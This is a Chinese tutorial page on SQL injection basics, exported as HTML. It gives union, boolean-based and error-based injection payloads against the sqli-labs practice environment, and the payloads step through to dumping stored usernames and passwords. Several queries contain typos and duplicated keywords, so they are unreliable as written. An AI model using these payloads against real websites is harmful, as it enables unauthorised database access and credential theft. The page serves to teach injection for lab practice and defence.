<div  id='write'  class = 'is-node'><h3><a name="web%E5%AE%89%E5%85%A8%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80" class="md-header-anchor"></a><span>web安全之SQL注入基础</span></h3><h1><a name="sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80" class="md-header-anchor"></a><span>SQL注入基础</span></h1><h2><a name="sql%E6%B3%A8%E5%85%A5%E4%BB%8B%E7%BB%8D" class="md-header-anchor"></a><span>SQL注入介绍</span></h2><h3><a name="web%E8%AF%B7%E6%B1%82%E5%93%8D%E5%BA%94%E8%BF%87%E7%A8%8B%EF%BC%9A" class="md-header-anchor"></a><span>Web请求响应过程：</span></h3><p><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58jreepkjj30sb0awdru.jpg' alt='' referrerPolicy='no-referrer' /><span>                                           </span></p><h3><a name="%E4%BB%80%E4%B9%88%E6%98%AFsql%E6%B3%A8%E5%85%A5%EF%BC%9F" class="md-header-anchor"></a><span>什么是SQL注入？</span></h3><p><span>就是指web应用程序对用户输入数据的合法性没有判断，前端传入后端的参数是攻击者可控的，并且参数带入数据库查询，攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。</span></p><h3><a name="%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BC%9A%E4%BA%A7%E7%94%9Fsql%E6%B3%A8%E5%85%A5?" class="md-header-anchor"></a><span>为什么会产生sql注入?</span></h3><p><span>开发人员可以使用动态SQL语句创建通用，灵活的应用。动态SQL语句是在执行过程中构造的，它根据不同的条件产生不同的sql语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段（如select语句）,或者根据不同的条件选择不同的查询表时，动态地构造SQL语句会非常有用。</span></p><blockquote><blockquote><p><span>Php语句为列：</span></p></blockquote></blockquote><blockquote><blockquote><p><code>$query=“SELECT * FROM users WHERE id = $_GET[‘id’]”;</code></p></blockquote></blockquote><p><span>由于这里的参数ID可控，且带入数据库查询，所以非法用户可以任意拼接SQL语句进行攻击。</span></p><p><span>   </span><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58jsq6ujpj30sh0fy0wh.jpg' alt='' referrerPolicy='no-referrer' /></p><p><span> </span></p><h2><a name="sql%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8E%9F%E7%90%86" class="md-header-anchor"></a><span>SQL注入的原理</span></h2><h3><a name="sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BA%A7%E7%94%9F%E9%9C%80%E8%A6%81%E6%BB%A1%E8%B6%B3%E9%82%A3%E4%B8%A4%E4%B8%AA%E6%9D%A1%E4%BB%B6%EF%BC%9F" class="md-header-anchor"></a><span>Sql注入漏洞的产生需要满足那两个条件？</span></h3><p><span>		</span><span>参数用户可控：前端传给后端的参数内容是用户可以控制的。</span></p><p><span>		</span><span>参数带入数据库查询：传入的参数拼接到sql语句，且带入数据库查询。</span></p><p><strong><span>当传入ID参数为1&#39;时，数据库执行的代码如下所示。</span></strong><span>   </span></p><p><code>sehlect * from users where id =1&#39;</code></p><p><strong><span>这样是会报出错误的，因为这不符合数据库语法规范。</span></strong></p><p><strong><span>当传入的ID参数为and 1=1 时，执行的SQL语句如下所示。</span></strong></p><p><code>select * from users where id = 1&#39; and 1=1</code></p><p><strong><span>因为1=1为真，且where语句中id1=1也为真，所以页面会返回与id=1相同的结果。</span></strong></p><p><strong><span>当传入的ID参数为and 1=2时，由于1=2不成立，所以返回假，页面就会返回与id=1不同的结果。</span></strong></p><p><strong><span>由此可以初步判断ID参数存在SQL注入漏洞，攻击者可以进一步拼接SQL语句进行攻击，致使数据库信息泄露，甚至进一步获取服务器权限等。</span></strong></p><p><span>—————————————————————————————————————————————————————</span></p><p><strong><span>在实际环境中，凡是满足上述两个条件的参数皆可能存在SQL注入漏洞，因此开发者需秉持“外部参数皆不可信的原则”进行开发。</span></strong></p><p><span> —————————————————————————————————————————————————————  </span></p><h2><a name="%E4%B8%8Emysql%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9" class="md-header-anchor"></a><span>与MySQL注入相关的知识点</span></h2><p><span> </span></p><h3><a name="mysql%E6%95%B0%E6%8D%AE%E5%BA%93" class="md-header-anchor"></a><span>Mysql数据库</span></h3><p><span>数据库A=网站A</span></p><p><span>        表名</span></p><p><span>           列名</span></p><p><span>             数据</span></p><p><span>数据库 B=网站B</span></p><pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang=""><div class="CodeMirror cm-s-inner CodeMirror-wrap" lang=""><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 0px; left: 4px;"><textarea autocorrect="off" autocapitalize="off" spellcheck="false" tabindex="0" style="position: absolute; bottom: -1em; padding: 0px; width: 1000px; height: 1em; outline: none;"></textarea></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 0px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><span><span>​</span>x</span></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">数据库 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 0px; width: 1px; border-bottom: 0px solid transparent; top: 78px;"></div><div class="CodeMirror-gutters" style="display: none; height: 78px;"></div></div></div></pre><p>&nbsp;</p><p><span>在MySql5.0 版本之后，MySql默认在数据库中存放一个</span><code>“information_schema”</code><span>的数据库，在该库中，读者需要记住三个表名，分别是</span></p><p><code>SCHEMATA,TABLES,COLUMNS</code></p><p><code>SCHEMNSz表存储该用户创建的所有数据库的库名，我们需要记住该表中记录数据库库名的字段名为SCHEMA_NAME</code></p><p><code>TABLES</code><span>表存储该用户创建的所有数据库的库名和表名，我们需要记住该表中记录数据库库名和表名的字段名分别为</span><code>TABLE_SCHEMA和TABLE_NAME</code><span>。</span></p><p><code>COLUMNS</code><span>表名和字段名的字段名为</span><code>TABLE_SCHEMA，TABLE_NAME和COLUMN_NAME</code><span>。</span></p><p>&nbsp;</p><h3><a name="mysql%E6%9F%A5%E8%AF%A2%E8%AF%AD%E5%8F%A5" class="md-header-anchor"></a><span>Mysql查询语句</span></h3><p><span>  在不知道任何条件时，语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名</code></p><p><span>  在知道一条已知条件时，语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知条件的字段名=‘已知条件的值’</code></p><p><span>  在知道两条已知条件时，语句如下所示。</span></p><p><code>SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知道条件1的字段名=‘已知条件1的值’ AND 已知条件2的字段名=‘已知条件2的值’</code></p><h3><a name="limit-%E7%9A%84%E7%94%A8%E6%B3%95" class="md-header-anchor"></a><span>Limit 的用法</span></h3><p><span>Limit的使用格式为limit m,n, 其中m是指记录开始的位置，从0开始，表示第一条记录;n是指取n条记录。</span></p><p><span>例如limit 0,1表示从第一条记录开始，取一条记录，</span></p><h3><a name="%E9%9C%80%E8%A6%81%E8%AE%B0%E4%BD%8F%E7%9A%84%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0" class="md-header-anchor"></a><span>需要记住的几个函数</span></h3><p><code>Database():当前网站使用的数据库</code></p><p><code>Version():当前MySQL的版本</code></p><p><code>User():当前MySQL的用户</code></p><h3><a name="%E6%B3%A8%E9%87%8A%E7%AC%A6%E5%8F%B7" class="md-header-anchor"></a><span>注释符号</span></h3><p><span>   在MySQL中，常见注释符的表达方式：</span><code>#或-- 空格或/**/</code></p><h3><a name="%E5%86%85%E8%81%94%E6%B3%A8%E9%87%8A" class="md-header-anchor"></a><span>内联注释</span></h3><p><span>内联注释的形式：/</span><em><span>! code</span></em><span>/。内联注释可以用于整个SQL语句中，用来执行我们的SQL语句，下面举一个列： </span></p><p><code>index.php?id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3</code></p><p>&nbsp;</p><h2><a name="union%EF%BC%88%E8%81%94%E5%90%88%EF%BC%89%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>Union（联合）注入攻击</span></h2><p>[<span>在线靶场</span>][http://43.247.91.228:84/Less-1/?id=1]</p><p><a href='http://127.0.0.1/sqli-labs/Less-1/?id=1' target='_blank' class='url'>http://127.0.0.1/sqli-labs/Less-1/?id=1</a></p><h3><a name="%E4%B8%80%E3%80%81%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E7%94%A8(%27)%E5%81%9A%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%BC%95%E5%8F%B7" class="md-header-anchor"></a><span>一、判断是否用(&#39;)做字符串引号</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;and 1=1 --+</code></p><p><code>https://blog.csdn.net/qq_41630808/article/details/80570197</code></p><p><span>正常输出</span></p><p><span>出错代表没有闭合  说明没有用’可能没有用&#39; 或用了&quot;或() </span></p><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+</code></p><p><span>则是&#39;&#39;字符串注入</span></p><h3><a name="%E4%BA%8C%E3%80%81%E5%88%A4%E6%96%AD%E5%AE%83%E6%89%80%E5%9C%A8%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%89%E5%87%A0%E5%88%97" class="md-header-anchor"></a><span>二、判断它所在的数据库有几列</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;order by 3 --+ 判断是否有3列</code></p><p><span>正常</span></p><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;order by 4 --+ 判断是否有4列</code></p><p><span>错误</span></p><p><span>说明它输出的内容所在的数据库有3列</span></p><h3><a name="%E4%B8%89%E3%80%81%E5%88%A4%E6%96%AD%E4%BB%96%E6%98%BE%E7%A4%BA%E7%9A%84%E5%86%85%E5%AE%B9%E5%9C%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E7%AC%AC%E5%87%A0%E5%88%97" class="md-header-anchor"></a><span>三、判断他显示的内容在数据库的第几列</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,2,3 --+</code></p><p><span>则 Your Login name 在第二列Your Password在第三列</span></p><p><span>我选择在第二列输出我想要的内容</span></p><h3><a name="%E5%9B%9B%E3%80%81%E6%9F%A5%E6%89%BE%E5%87%BA%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90" class="md-header-anchor"></a><span>四、查找出当前用户权限</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,user(),3 --+</code></p><p><span>root权限</span></p><h3><a name="%E4%BA%94%E3%80%81%E6%9F%A5%E6%89%BE%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93" class="md-header-anchor"></a><span>五、查找当前数据库</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,database(),3 --+</code></p><h3><a name="%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E6%98%AF-security" class="md-header-anchor"></a><span>当前数据库是 security</span></h3><h3><a name="%E5%85%AD%E3%80%81%E6%9F%A5%E6%89%BEsecurity%E7%9A%84%E8%A1%A8%E5%90%8D" class="md-header-anchor"></a><span>六、查找security的表名</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =&#39;security&#39;),3 --+</code></p><p><span>表名是 emails,referers,uagents,users</span></p><blockquote><blockquote><p><span>group_concat()会计算哪些行属于同一组，将属于同一组的列显示出来。要返回哪些列，由函</span></p></blockquote></blockquote><blockquote><blockquote><p><span>数参数(就是字段名)决定  </span></p></blockquote></blockquote><h3><a name="%E4%B8%83%E3%80%81%E6%9F%A5%E6%89%BEusers%E9%87%8C%E7%9A%84%E5%AD%97%E6%AE%B5" class="md-header-anchor"></a><span>七、查找users里的字段</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = &#39;security&#39; and table_name = &#39;users&#39;),3 --+</code></p><h3><a name="%E5%85%AB%E3%80%81%E6%9F%A5%E6%89%BE%E7%94%A8%E6%88%B7%E5%90%8D" class="md-header-anchor"></a><span>八、查找用户名</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,(select group_concat(username) from security.users),3 --+</code><span> </span></p><h3><a name="%E4%B9%9D%E3%80%81%E6%9F%A5%E6%89%BE%E5%AF%86%E7%A0%81" class="md-header-anchor"></a><span>九、查找密码</span></h3><p><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39; union select 1,(select group_concat(password) from security.users),3 --+</code></p><p><span>这样 这个就完成了  已经拿到了账号密码 </span></p><h2><a name="union--(%E8%81%94%E5%90%88)-%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90" class="md-header-anchor"></a><span>Union  (联合) 注入代码分析 </span></h2><p><strong><span>在Union注入页面中，程序获取GET参数ID，将ID拼接到SQL语句中，在数据库中查询参数的ID对应的内容，然后将第一条查询结果中的</span><code>username</code><span>和</span><code>address</code><span>输出到页面，</span></strong></p><p><strong><span>由于是将数据输出到页面上的，所以利用Union语句查询其他数据，代码如下：</span></strong></p><p><span> ![</span></p><p><span>](</span><a href='http://ww1.sinaimg.cn/large/007bHQE8gy1g58le58wz5j30ou0bo77h.jpg' target='_blank' class='url'>http://ww1.sinaimg.cn/large/007bHQE8gy1g58le58wz5j30ou0bo77h.jpg</a><span>)</span></p><p><strong><span>当访问</span><code>id=1 union select 1,2,3</code><span>时，执行的SQL语句为:</span></strong></p><p><span>`Select </span><span>*</span><span> from users where ‘id’=1 union select 1,2,3``</span></p><p><span>  </span><strong><span>此时sql语句可以分为</span><code>select \* from users where ‘id’=1</code><span>和</span><code>union select 1,2,3</code><span>两条，利用第二条语句（Union查询）就可以获取数据库中的数据。</span></strong></p><p><span> </span><strong><span>（优化在源码中添加sql语句执行代码）</span></strong></p><h2><a name="boolean--(%E5%B8%83%E5%B0%94%E5%9E%8B)-%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>Boolean  (布尔型) 注入攻击</span></h2><p><code>1&#39; and length(database())&gt;=1--+         //判断数据库的长度</code></p><p><code>l&#39; and substr(database(),1,1)=‘t’ --+       //判断数据库第一个字母的值</code></p><p><code>l&#39; and substr(database(),2,1)=‘q’ --+      //判断数据库的第二个字母的值</code></p><p><code>l&#39; and ord(substr(database(),1,1))=115--+  //利用ord和ASCII判断数据库库名</code></p><p><code>l&#39; and substr(database(),2,1)=’q’--+       //利用substr判断数据库的库名</code></p><p><code>l&#39; and substr(select table_name from information_schema.table where table_schema=‘sql’ limit 0,1),1,1)=‘e’ --+   //利用substr判断数据库的表名</code></p><p><span> </span></p><p><strong><span>1.</span></strong><span>    </span><code>length(str)</code><span>：返回str字符串的长度。</span></p><p><strong><span>2.</span></strong><span>    </span><code>substr(str, pos, len)</code><span>：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始</span></p><p><strong><span>3.</span></strong><span>   </span><code>mid(str,pos,len):</code><span>跟上面的一样，截取字符串</span></p><p><strong><span>4.</span></strong><span>    </span><code>ascii(str)</code><span>：返回字符串str的最左面字符的ASCII代码值。</span></p><p><strong><span>5.</span></strong><span>    </span><code>ord(str):</code><span>同上，返回ascii码</span></p><p><strong><span>6.</span></strong><span>    </span><code>if(a,b,c) :a</code><span>为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</span></p><h2><a name="boolean-(%E5%B8%83%E5%B0%94%E5%9E%8B)%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90" class="md-header-anchor"></a><span>Boolean (布尔型)注入代码分析</span></h2><p><span>在Boolean注入页面中程序先获取GET参数ID,通过preg_match判断其中是否存在union/sleep/benchmark等危险字符。然后将参数ID拼接到SQL语句，从数据库中查询，</span></p><p><img src='http://ww1.sinaimg.cn/large/007bHQE8gy1g58ldmekhdj30lr0dsgoe.jpg' alt='' referrerPolicy='no-referrer' /></p><p><span>当访问id=1‘ or 1=1%23时，数据库执行的语句为selcet </span><span>*</span><span> from user where ‘id’=’1’ or 1=1#,由于or 1=1是永真条件，所有此时返回正常。当访问id=1‘ and 1=2%23时，</span></p><p><span>数据库执行的语句为select </span><span>*</span><span> from users where ‘id’ = ‘1’ and 1=2#, 由于and‘1‘ =’2‘ 是永假条件，所有此时页面肯定会返=返回错误。</span></p><h2><a name="%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB" class="md-header-anchor"></a><span>报错注入攻击</span></h2><p><span>updatexml(1,concat(0x7e,(select user()),0x7e),1)--+       //利用updatexml获取user()</span></p><p><span>‘ and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+   //利用updatexml获取database（）</span></p><p><span>`‘ and updatexml(1,concat(0x7e,(select select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+**              </span><strong><span>//*</span></strong><span>*利用报错注入获取数据库库名</span></p><p><span>‘ and updatexml(1,concat(0x7e,(select select table_name from information_schema.tables where table_schema= ‘test’  limit 0,1),0x7e),1)--+    //利用报错注入获取数据库表名 </span></p><pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" style="break-inside: unset;"><div class="CodeMirror cm-s-inner CodeMirror-wrap" lang=""><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 0px; left: 4px;"><textarea autocorrect="off" autocapitalize="off" spellcheck="false" tabindex="0" style="position: absolute; bottom: -1em; padding: 0px; width: 1000px; height: 1em; outline: none;"></textarea></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 0px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">## 报错注入攻击代码分析</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">**在报错注入页面中，程序获取GET参数username 后，将username拼接到SQL语句中然后，然后到数据库查询。**</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> ![](http://ww1.sinaimg.cn/large/007bHQE8gy1g58lsi2dz3j30ua0a9419.jpg)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> &nbsp; </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">输入username=1‘时，SQL语句为select * from user where ‘username’=‘1“。执行时会因为多了一个单引号而报错。利用这种错误回显，我们可以通过floor(),updatexml()</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">等函数将要查询的内容输出到页面上。</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> </span></pre></div></div></div></div></div><div style="position: absolute; height: 0px; width: 1px; border-bottom: 0px solid transparent; top: 676px;"></div><div class="CodeMirror-gutters" style="display: none; height: 676px;"></div></div></div></pre></div>
</body>
</html>